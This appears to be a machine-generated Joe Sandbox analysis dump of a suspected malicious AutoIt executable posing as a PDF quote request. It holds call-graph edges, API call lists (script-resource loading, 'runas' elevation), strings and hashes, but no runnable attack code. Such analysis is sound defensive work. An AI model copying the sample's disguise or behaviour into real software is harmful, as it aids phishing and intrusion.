96498->96408 96499->96494 96501 a4400a 96500->96501 96503 a440ae 96500->96503 96502 a5fe0b 22 API calls 96501->96502 96504 a4403c 96501->96504 96502->96504 96503->96408 96504->96503 96505 a5fddb 22 API calls 96504->96505 96505->96504 96506->96403 96508 a44f43 96507->96508 96509 a44f4a 96507->96509 96704 a6e678 96508->96704 96511 a44f59 96509->96511 96512 a44f6a FreeLibrary 96509->96512 96511->96399 96512->96511 96513->96404 96514->96408 96515->96408 96516->96411 96518 a44ec6 96517->96518 96519 a44ea8 GetProcAddress 96517->96519 96522 a6e5eb 
96518->96522 96520 a44eb8 96519->96520 96520->96518 96521 a44ebf FreeLibrary 96520->96521 96521->96518 96555 a6e52a 96522->96555 96524 a44eea 96524->96446 96524->96447 96526 a44e8d 96525->96526 96527 a44e6e GetProcAddress 96525->96527 96530 a44f80 96526->96530 96528 a44e7e 96527->96528 96528->96526 96529 a44e86 FreeLibrary 96528->96529 96529->96526 96531 a5fe0b 22 API calls 96530->96531 96532 a44f95 96531->96532 96623 a45722 96532->96623 96534 a44fa1 __fread_nolock 96535 a450a5 96534->96535 96536 a83d1d 96534->96536 96546 a44fdc 96534->96546 96626 a442a2 CreateStreamOnHGlobal 96535->96626 96637 ab304d 74 API calls 96536->96637 96539 a83d22 96541 a4511f 64 API calls 96539->96541 96540 a450f5 40 API calls 96540->96546 96542 a83d45 96541->96542 96543 a450f5 40 API calls 96542->96543 96545 a4506e messages 96543->96545 96545->96455 96546->96539 96546->96540 96546->96545 96632 a4511f 96546->96632 96548 a45107 96547->96548 96549 a83d70 96547->96549 96659 a6e8c4 96548->96659 96552 ab28fe 96680 ab274e 96552->96680 96554 ab2919 96554->96462 96557 a6e536 ___DestructExceptionObject 96555->96557 96556 a6e544 96580 a6f2d9 20 API calls __dosmaperr 96556->96580 96557->96556 96559 a6e574 96557->96559 96562 a6e586 96559->96562 96563 a6e579 96559->96563 96560 a6e549 96581 a727ec 26 API calls ___std_exception_copy 96560->96581 96572 a78061 96562->96572 96582 a6f2d9 20 API calls __dosmaperr 96563->96582 96566 a6e58f 96567 a6e595 96566->96567 96568 a6e5a2 96566->96568 96583 a6f2d9 20 API calls __dosmaperr 96567->96583 96584 a6e5d4 LeaveCriticalSection __fread_nolock 96568->96584 96569 a6e554 __wsopen_s 96569->96524 96573 a7806d ___DestructExceptionObject 96572->96573 96585 a72f5e EnterCriticalSection 96573->96585 96575 a7807b 96586 a780fb 96575->96586 96579 a780ac __wsopen_s 96579->96566 96580->96560 96581->96569 96582->96569 96583->96569 96584->96569 96585->96575 96593 a7811e 96586->96593 96587 a78088 96599 a780b7 96587->96599 96588 a78177 96604 a74c7d 96588->96604 96593->96587 
96593->96588 96602 a6918d EnterCriticalSection 96593->96602 96603 a691a1 LeaveCriticalSection 96593->96603 96594 a78189 96594->96587 96617 a73405 11 API calls 2 library calls 96594->96617 96596 a781a8 96618 a6918d EnterCriticalSection 96596->96618 96622 a72fa6 LeaveCriticalSection 96599->96622 96601 a780be 96601->96579 96602->96593 96603->96593 96610 a74c8a FindHandlerForForeignException 96604->96610 96605 a74cca 96620 a6f2d9 20 API calls __dosmaperr 96605->96620 96606 a74cb5 RtlAllocateHeap 96608 a74cc8 96606->96608 96606->96610 96611 a729c8 96608->96611 96610->96605 96610->96606 96619 a64ead 7 API calls 2 library calls 96610->96619 96612 a729d3 RtlFreeHeap 96611->96612 96616 a729fc _free 96611->96616 96613 a729e8 96612->96613 96612->96616 96621 a6f2d9 20 API calls __dosmaperr 96613->96621 96615 a729ee GetLastError 96615->96616 96616->96594 96617->96596 96618->96587 96619->96610 96620->96608 96621->96615 96622->96601 96624 a5fddb 22 API calls 96623->96624 96625 a45734 96624->96625 96625->96534 96627 a442bc FindResourceExW 96626->96627 96631 a442d9 96626->96631 96628 a835ba LoadResource 96627->96628 96627->96631 96629 a835cf SizeofResource 96628->96629 96628->96631 96630 a835e3 LockResource 96629->96630 96629->96631 96630->96631 96631->96546 96633 a4512e 96632->96633 96636 a83d90 96632->96636 96638 a6ece3 96633->96638 96637->96539 96641 a6eaaa 96638->96641 96640 a4513c 96640->96546 96642 a6eab6 ___DestructExceptionObject 96641->96642 96643 a6eac2 96642->96643 96644 a6eae8 96642->96644 96654 a6f2d9 20 API calls __dosmaperr 96643->96654 96656 a6918d EnterCriticalSection 96644->96656 96647 a6eac7 96655 a727ec 26 API calls ___std_exception_copy 96647->96655 96648 a6eaf4 96657 a6ec0a 62 API calls 2 library calls 96648->96657 96651 a6eb08 96658 a6eb27 LeaveCriticalSection __fread_nolock 96651->96658 96653 a6ead2 __wsopen_s 96653->96640 96654->96647 96655->96653 96656->96648 96657->96651 96658->96653 96662 a6e8e1 96659->96662 96661 a45118 96661->96552 96663 a6e8ed 
___DestructExceptionObject 96662->96663 96664 a6e92d 96663->96664 96666 a6e900 ___scrt_fastfail 96663->96666 96674 a6e925 __wsopen_s 96663->96674 96677 a6918d EnterCriticalSection 96664->96677 96675 a6f2d9 20 API calls __dosmaperr 96666->96675 96667 a6e937 96678 a6e6f8 38 API calls 4 library calls 96667->96678 96670 a6e91a 96676 a727ec 26 API calls ___std_exception_copy 96670->96676 96671 a6e94e 96679 a6e96c LeaveCriticalSection __fread_nolock 96671->96679 96674->96661 96675->96670 96676->96674 96677->96667 96678->96671 96679->96674 96683 a6e4e8 96680->96683 96682 ab275d 96682->96554 96686 a6e469 96683->96686 96685 a6e505 96685->96682 96687 a6e48c 96686->96687 96688 a6e478 96686->96688 96692 a6e488 __alldvrm 96687->96692 96696 a7333f 11 API calls 2 library calls 96687->96696 96694 a6f2d9 20 API calls __dosmaperr 96688->96694 96691 a6e47d 96695 a727ec 26 API calls ___std_exception_copy 96691->96695 96692->96685 96694->96691 96695->96692 96696->96692 96700 ab2e7a 96697->96700 96698 a450f5 40 API calls 96698->96700 96699 ab28fe 27 API calls 96699->96700 96700->96698 96700->96699 96701 ab2d3b 96700->96701 96702 a4511f 64 API calls 96700->96702 96701->96469 96701->96470 96702->96700 96703->96469 96705 a6e684 ___DestructExceptionObject 96704->96705 96706 a6e695 96705->96706 96707 a6e6aa 96705->96707 96717 a6f2d9 20 API calls __dosmaperr 96706->96717 96709 a6e6a5 __wsopen_s 96707->96709 96719 a6918d EnterCriticalSection 96707->96719 96709->96509 96711 a6e69a 96718 a727ec 26 API calls ___std_exception_copy 96711->96718 96712 a6e6c6 96720 a6e602 96712->96720 96715 a6e6d1 96736 a6e6ee LeaveCriticalSection __fread_nolock 96715->96736 96717->96711 96718->96709 96719->96712 96721 a6e624 96720->96721 96722 a6e60f 96720->96722 96728 a6e61f 96721->96728 96739 a6dc0b 96721->96739 96737 a6f2d9 20 API calls __dosmaperr 96722->96737 96725 a6e614 96738 a727ec 26 API calls ___std_exception_copy 96725->96738 96728->96715 96732 a6e646 96756 a7862f 96732->96756 96735 a729c8 _free 20 API 
calls 96735->96728 96736->96709 96737->96725 96738->96728 96740 a6dc23 96739->96740 96744 a6dc1f 96739->96744 96741 a6d955 __fread_nolock 26 API calls 96740->96741 96740->96744 96742 a6dc43 96741->96742 96771 a759be 62 API calls 5 library calls 96742->96771 96745 a74d7a 96744->96745 96746 a6e640 96745->96746 96747 a74d90 96745->96747 96749 a6d955 96746->96749 96747->96746 96748 a729c8 _free 20 API calls 96747->96748 96748->96746 96750 a6d976 96749->96750 96751 a6d961 96749->96751 96750->96732 96772 a6f2d9 20 API calls __dosmaperr 96751->96772 96753 a6d966 96773 a727ec 26 API calls ___std_exception_copy 96753->96773 96755 a6d971 96755->96732 96757 a78653 96756->96757 96758 a7863e 96756->96758 96760 a7868e 96757->96760 96765 a7867a 96757->96765 96774 a6f2c6 20 API calls __dosmaperr 96758->96774 96779 a6f2c6 20 API calls __dosmaperr 96760->96779 96762 a78643 96775 a6f2d9 20 API calls __dosmaperr 96762->96775 96763 a78693 96780 a6f2d9 20 API calls __dosmaperr 96763->96780 96776 a78607 96765->96776 96768 a7869b 96781 a727ec 26 API calls ___std_exception_copy 96768->96781 96769 a6e64c 96769->96728 96769->96735 96771->96744 96772->96753 96773->96755 96774->96762 96775->96769 96782 a78585 96776->96782 96778 a7862b 96778->96769 96779->96763 96780->96768 96781->96769 96783 a78591 ___DestructExceptionObject 96782->96783 96793 a75147 EnterCriticalSection 96783->96793 96785 a7859f 96786 a785c6 96785->96786 96787 a785d1 96785->96787 96788 a786ae __wsopen_s 29 API calls 96786->96788 96794 a6f2d9 20 API calls __dosmaperr 96787->96794 96790 a785cc 96788->96790 96795 a785fb LeaveCriticalSection __wsopen_s 96790->96795 96792 a785ee __wsopen_s 96792->96778 96793->96785 96794->96790 96795->96792 96796 a93a41 96800 ab10c0 96796->96800 96798 a93a4c 96799 ab10c0 53 API calls 96798->96799 96799->96798 96801 ab10fa 96800->96801 96805 ab10cd 96800->96805 96801->96798 96802 ab10fc 96844 a5fa11 53 API calls 96802->96844 96803 ab1101 96811 a47510 96803->96811 96805->96801 96805->96802 
96805->96803 96809 ab10f4 96805->96809 96843 a4b270 39 API calls 96809->96843 96812 a47525 96811->96812 96828 a47522 96811->96828 96813 a4752d 96812->96813 96814 a4755b 96812->96814 96845 a651c6 26 API calls 96813->96845 96818 a8500f 96814->96818 96819 a4756d 96814->96819 96824 a850f6 96814->96824 96816 a4753d 96823 a5fddb 22 API calls 96816->96823 96827 a5fe0b 22 API calls 96818->96827 96833 a85088 96818->96833 96852 a5fb21 51 API calls 96819->96852 96820 a8510e 96820->96820 96825 a47547 96823->96825 96854 a65183 26 API calls 96824->96854 96846 a49cb3 96825->96846 96829 a85058 96827->96829 96834 a46350 96828->96834 96830 a5fddb 22 API calls 96829->96830 96831 a8507f 96830->96831 96832 a49cb3 22 API calls 96831->96832 96832->96833 96853 a5fb21 51 API calls 96833->96853 96835 a46362 96834->96835 96836 a84a51 96834->96836 96855 a46373 96835->96855 96865 a44a88 22 API calls __fread_nolock 96836->96865 96839 a4636e 96839->96801 96840 a84a5b 96841 a84a67 96840->96841 96842 a4a8c7 22 API calls 96840->96842 96842->96841 96843->96801 96844->96803 96845->96816 96847 a49cc2 _wcslen 96846->96847 96848 a5fe0b 22 API calls 96847->96848 96849 a49cea __fread_nolock 96848->96849 96850 a5fddb 22 API calls 96849->96850 96851 a49d00 96850->96851 96851->96828 96852->96816 96853->96824 96854->96820 96856 a463b6 __fread_nolock 96855->96856 96857 a46382 96855->96857 96856->96839 96857->96856 96858 a84a82 96857->96858 96859 a463a9 96857->96859 96860 a5fddb 22 API calls 96858->96860 96866 a4a587 96859->96866 96862 a84a91 96860->96862 96863 a5fe0b 22 API calls 96862->96863 96864 a84ac5 __fread_nolock 96863->96864 96865->96840 96868 a4a59d 96866->96868 96870 a4a598 __fread_nolock 96866->96870 96867 a8f80f 96868->96867 96869 a5fe0b 22 API calls 96868->96869 96869->96870 96870->96856 96871 a41cad SystemParametersInfoW 96872 a92a00 96886 a4d7b0 messages 96872->96886 96873 a4db11 PeekMessageW 96873->96886 96874 a4d807 GetInputState 96874->96873 96874->96886 96875 a91cbe TranslateAcceleratorW 
96875->96886 96877 a4db73 TranslateMessage DispatchMessageW 96878 a4db8f PeekMessageW 96877->96878 96878->96886 96879 a4da04 timeGetTime 96879->96886 96880 a4dbaf Sleep 96898 a4dbc0 96880->96898 96881 a92b74 Sleep 96881->96898 96882 a91dda timeGetTime 96991 a5e300 23 API calls 96882->96991 96883 a5e551 timeGetTime 96883->96898 96886->96873 96886->96874 96886->96875 96886->96877 96886->96878 96886->96879 96886->96880 96886->96881 96886->96882 96892 a4d9d5 96886->96892 96900 a4ec40 207 API calls 96886->96900 96904 a4dd50 96886->96904 96911 a4dfd0 96886->96911 96934 a51310 96886->96934 96989 a4bf40 207 API calls 2 library calls 96886->96989 96990 a5edf6 IsDialogMessageW GetClassLongW 96886->96990 96992 ab3a2a 23 API calls 96886->96992 96993 ab359c 82 API calls __wsopen_s 96886->96993 96887 a92c0b GetExitCodeProcess 96889 a92c21 WaitForSingleObject 96887->96889 96890 a92c37 CloseHandle 96887->96890 96889->96886 96889->96890 96890->96898 96891 a92a31 96891->96892 96893 ad29bf GetForegroundWindow 96893->96898 96894 a92ca9 Sleep 96894->96886 96898->96883 96898->96886 96898->96887 96898->96891 96898->96892 96898->96893 96898->96894 96994 ac5658 23 API calls 96898->96994 96995 aae97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96898->96995 96996 aad4dc 47 API calls 96898->96996 96900->96886 96905 a4dd83 96904->96905 96906 a4dd6f 96904->96906 96998 ab359c 82 API calls __wsopen_s 96905->96998 96997 a4d260 207 API calls 2 library calls 96906->96997 96908 a4dd7a 96908->96886 96910 a92f75 96910->96910 96912 a4e010 96911->96912 96929 a4e0dc messages 96912->96929 97001 a60242 5 API calls __Init_thread_wait 96912->97001 96915 a92fca 96917 a4a961 22 API calls 96915->96917 96915->96929 96916 a4a961 22 API calls 96916->96929 96918 a92fe4 96917->96918 97002 a600a3 29 API calls __onexit 96918->97002 96923 a92fee 97003 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96923->97003 96924 a4ec40 207 API calls 96924->96929 96927 
a4a8c7 22 API calls 96927->96929 96928 a504f0 22 API calls 96928->96929 96929->96916 96929->96924 96929->96927 96929->96928 96930 a4e3e1 96929->96930 96932 ab359c 82 API calls 96929->96932 96999 a4a81b 41 API calls 96929->96999 97000 a5a308 207 API calls 96929->97000 97004 a60242 5 API calls __Init_thread_wait 96929->97004 97005 a600a3 29 API calls __onexit 96929->97005 97006 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96929->97006 97007 ac47d4 207 API calls 96929->97007 97008 ac68c1 207 API calls 96929->97008 96930->96886 96932->96929 96935 a51376 96934->96935 96936 a517b0 96934->96936 96937 a51390 96935->96937 96938 a96331 96935->96938 97161 a60242 5 API calls __Init_thread_wait 96936->97161 96940 a51940 9 API calls 96937->96940 96941 a9633d 96938->96941 97120 ac709c 96938->97120 96944 a513a0 96940->96944 96941->96886 96943 a517ba 96945 a517fb 96943->96945 96946 a49cb3 22 API calls 96943->96946 96947 a51940 9 API calls 96944->96947 96949 a96346 96945->96949 96951 a5182c 96945->96951 96954 a517d4 96946->96954 96948 a513b6 96947->96948 96948->96945 96950 a513ec 96948->96950 97166 ab359c 82 API calls __wsopen_s 96949->97166 96950->96949 96956 a51408 __fread_nolock 96950->96956 97163 a4aceb 23 API calls messages 96951->97163 97162 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96954->97162 96955 a51839 97164 a5d217 207 API calls 96955->97164 96956->96955 96959 a9636e 96956->96959 96967 a5fddb 22 API calls 96956->96967 96968 a5fe0b 22 API calls 96956->96968 96973 a4ec40 207 API calls 96956->96973 96975 a515c7 messages 96956->96975 96976 a5152f 96956->96976 96978 a963b2 96956->96978 97167 ab359c 82 API calls __wsopen_s 96959->97167 96961 a963d1 97169 ac5745 54 API calls _wcslen 96961->97169 96962 a5153c 96965 a51940 9 API calls 96962->96965 96963 a51872 97165 a5faeb 23 API calls 96963->97165 96966 a51549 96965->96966 96970 a51940 9 API calls 96966->96970 96966->96975 96967->96956 96968->96956 96974 a51563 96970->96974 
96971 a5171d 96971->96886 96973->96956 96974->96975 96982 a4a8c7 22 API calls 96974->96982 96975->96963 96977 a51940 9 API calls 96975->96977 96981 a5167b messages 96975->96981 97009 ab744a 96975->97009 97065 ac958b 96975->97065 97068 abf0ec 96975->97068 97077 ace204 96975->97077 97113 ab83da 96975->97113 97116 a46246 96975->97116 97170 ab359c 82 API calls __wsopen_s 96975->97170 96976->96961 96976->96962 96977->96975 97168 ab359c 82 API calls __wsopen_s 96978->97168 96981->96971 97160 a5ce17 22 API calls messages 96981->97160 96982->96975 96989->96886 96990->96886 96991->96886 96992->96886 96993->96886 96994->96898 96995->96898 96996->96898 96997->96908 96998->96910 96999->96929 97000->96929 97001->96915 97002->96923 97003->96929 97004->96929 97005->96929 97006->96929 97007->96929 97008->96929 97010 ab7469 97009->97010 97014 ab7474 97009->97014 97179 a4b567 39 API calls 97010->97179 97012 ab7554 97013 a5fddb 22 API calls 97012->97013 97055 ab76a4 97012->97055 97015 ab7587 97013->97015 97014->97012 97016 a4a961 22 API calls 97014->97016 97018 a5fe0b 22 API calls 97015->97018 97017 ab7495 97016->97017 97019 a4a961 22 API calls 97017->97019 97020 ab7598 97018->97020 97021 ab749e 97019->97021 97022 a46246 CloseHandle 97020->97022 97023 a47510 53 API calls 97021->97023 97024 ab75a3 97022->97024 97025 ab74aa 97023->97025 97026 a4a961 22 API calls 97024->97026 97180 a4525f 22 API calls 97025->97180 97028 ab75ab 97026->97028 97030 a46246 CloseHandle 97028->97030 97029 ab74bf 97031 a46350 22 API calls 97029->97031 97032 ab75b2 97030->97032 97033 ab74f2 97031->97033 97034 a47510 53 API calls 97032->97034 97035 ab754a 97033->97035 97181 aad4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97033->97181 97036 ab75be 97034->97036 97183 a4b567 39 API calls 97035->97183 97038 a46246 CloseHandle 97036->97038 97039 ab75c8 97038->97039 97171 a45745 97039->97171 97041 ab7502 97041->97035 97042 ab7506 97041->97042 97044 a49cb3 22 API calls 97042->97044 97046 ab7513 97044->97046 
97182 aad2c1 26 API calls 97046->97182 97047 ab75ea 97184 a453de 27 API calls messages 97047->97184 97048 ab76de GetLastError 97050 ab76f7 97048->97050 97191 a46216 CloseHandle messages 97050->97191 97053 ab751c 97053->97035 97054 ab75f8 97185 a453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97054->97185 97055->96975 97057 ab7645 97058 a5fddb 22 API calls 97057->97058 97060 ab7679 97058->97060 97059 ab75ff 97059->97057 97186 aaccff 97059->97186 97062 a4a961 22 API calls 97060->97062 97063 ab7686 97062->97063 97063->97055 97190 aa417d 22 API calls __fread_nolock 97063->97190 97194 ac7f59 97065->97194 97067 ac959b 97067->96975 97069 a47510 53 API calls 97068->97069 97070 abf126 97069->97070 97287 a49e90 97070->97287 97072 abf136 97073 abf15b 97072->97073 97074 a4ec40 207 API calls 97072->97074 97076 abf15f 97073->97076 97315 a49c6e 22 API calls 97073->97315 97074->97073 97076->96975 97078 a4a961 22 API calls 97077->97078 97079 ace21b 97078->97079 97080 a47510 53 API calls 97079->97080 97081 ace22a 97080->97081 97082 a46270 22 API calls 97081->97082 97083 ace23d 97082->97083 97084 a47510 53 API calls 97083->97084 97085 ace24a 97084->97085 97086 ace2c7 97085->97086 97087 ace262 97085->97087 97088 a47510 53 API calls 97086->97088 97347 a4b567 39 API calls 97087->97347 97090 ace2cc 97088->97090 97092 ace2d9 97090->97092 97093 ace314 97090->97093 97091 ace267 97091->97092 97095 ace280 97091->97095 97350 a49c6e 22 API calls 97092->97350 97096 ace32c 97093->97096 97351 a4b567 39 API calls 97093->97351 97348 a46d25 22 API calls __fread_nolock 97095->97348 97097 ace345 97096->97097 97352 a4b567 39 API calls 97096->97352 97101 a4a8c7 22 API calls 97097->97101 97103 ace35f 97101->97103 97102 ace28d 97104 a46350 22 API calls 97102->97104 97328 aa92c8 97103->97328 97106 ace29b 97104->97106 97349 a46d25 22 API calls __fread_nolock 97106->97349 97108 ace2b4 97109 a46350 22 API calls 97108->97109 97111 ace2c2 97109->97111 97110 ace2e6 97110->96975 97353 a462b5 22 API calls 

Control-flow Graph (function at a442de; nodes are marked Executed or Not Executed; graph not reproduced)

APIs
• GetVersionExW.KERNEL32(?), ref: 00A4430D
  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
• GetCurrentProcess.KERNEL32(?,00ADCB64,00000000,?,?), ref: 00A44422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00A44429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A44454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A44466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00A44474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00A4447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 00A444A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 9aed2384400259509bec50cc25570649213850ca8c5fd6b63b16b57ec0bc965c
• Instruction ID: d08489f8464dd15a527846063a3d017444b37d503552765dce5eb8f4be681b0f
• Opcode Fuzzy Hash: 9aed2384400259509bec50cc25570649213850ca8c5fd6b63b16b57ec0bc965c
• Instruction Fuzzy Hash: E8A1B57690A2D0FFCB11D77D7C453D97FA46B66700BC8CCAAD2A193A2ADA304505CB2D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 553 a442a2-a442ba CreateStreamOnHGlobal 554 a442bc-a442d3 FindResourceExW 553->554 555 a442da-a442dd 553->555 556 a835ba-a835c9 LoadResource 554->556 557 a442d9 554->557 556->557 558 a835cf-a835dd SizeofResource 556->558 557->555 558->557 559 a835e3-a835ee LockResource 558->559 559->557 560 a835f4-a83612 559->560 560->557
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00A450AA,?,?,00000000,00000000), ref: 00A442B2
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A450AA,?,?,00000000,00000000), ref: 00A442C9
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00A450AA,?,?,00000000,00000000,?,?,?,?,?,?,00A44F20), ref: 00A835BE
                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00A450AA,?,?,00000000,00000000,?,?,?,?,?,?,00A44F20), ref: 00A835D3
                                                                                                                • LockResource.KERNEL32(00A450AA,?,?,00A450AA,?,?,00000000,00000000,?,?,?,?,?,?,00A44F20,?), ref: 00A835E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A42B6B
                                                                                                                  • Part of subcall function 00A43A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B11418,?,00A42E7F,?,?,?,00000000), ref: 00A43A78
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00B02224), ref: 00A82C10
                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?,00B02224), ref: 00A82C17
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                • String ID: runas
                                                                                                                • API String ID: 448630720-4000483414
                                                                                                                APIs
                                                                                                                • GetInputState.USER32 ref: 00A4D807
                                                                                                                • timeGetTime.WINMM ref: 00A4DA07
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A4DB28
                                                                                                                • TranslateMessage.USER32(?), ref: 00A4DB7B
                                                                                                                • DispatchMessageW.USER32(?), ref: 00A4DB89
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A4DB9F
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00A4DBB1
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2189390790-0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00A42D07
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00A42D31
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A42D42
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00A42D5F
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A42D6F
                                                                                                                • LoadIconW.USER32(000000A9), ref: 00A42D85
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A42D94
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A8039A: CreateFileW.KERNELBASE(00000000,00000000,?,00A80704,?,?,00000000,?,00A80704,00000000,0000000C), ref: 00A803B7
                                                                                                                • GetLastError.KERNEL32 ref: 00A8076F
                                                                                                                • __dosmaperr.LIBCMT ref: 00A80776
                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 00A80782
                                                                                                                • GetLastError.KERNEL32 ref: 00A8078C
                                                                                                                • __dosmaperr.LIBCMT ref: 00A80795
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A807B5
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A808FF
                                                                                                                • GetLastError.KERNEL32 ref: 00A80931
                                                                                                                • __dosmaperr.LIBCMT ref: 00A80938
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                • String ID: H
                                                                                                                • API String ID: 4237864984-2852464175

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B11418,?,00A42E7F,?,?,?,00000000), ref: 00A43A78
                                                                                                                  • Part of subcall function 00A43357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A43379
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A4356A
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A8318D
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A831CE
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A83210
                                                                                                                • _wcslen.LIBCMT ref: 00A83277
                                                                                                                • _wcslen.LIBCMT ref: 00A83286
                                                                                                                Similarity
                                                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                • API String ID: 98802146-2727554177

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00A42B8E
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00A42B9D
                                                                                                                • LoadIconW.USER32(00000063), ref: 00A42BB3
                                                                                                                • LoadIconW.USER32(000000A4), ref: 00A42BC5
                                                                                                                • LoadIconW.USER32(000000A2), ref: 00A42BD7
                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A42BEF
                                                                                                                • RegisterClassExW.USER32(?), ref: 00A42C40
                                                                                                                  • Part of subcall function 00A42CD4: GetSysColorBrush.USER32(0000000F), ref: 00A42D07
                                                                                                                  • Part of subcall function 00A42CD4: RegisterClassExW.USER32(00000030), ref: 00A42D31
                                                                                                                  • Part of subcall function 00A42CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A42D42
                                                                                                                  • Part of subcall function 00A42CD4: InitCommonControlsEx.COMCTL32(?), ref: 00A42D5F
                                                                                                                  • Part of subcall function 00A42CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A42D6F
                                                                                                                  • Part of subcall function 00A42CD4: LoadIconW.USER32(000000A9), ref: 00A42D85
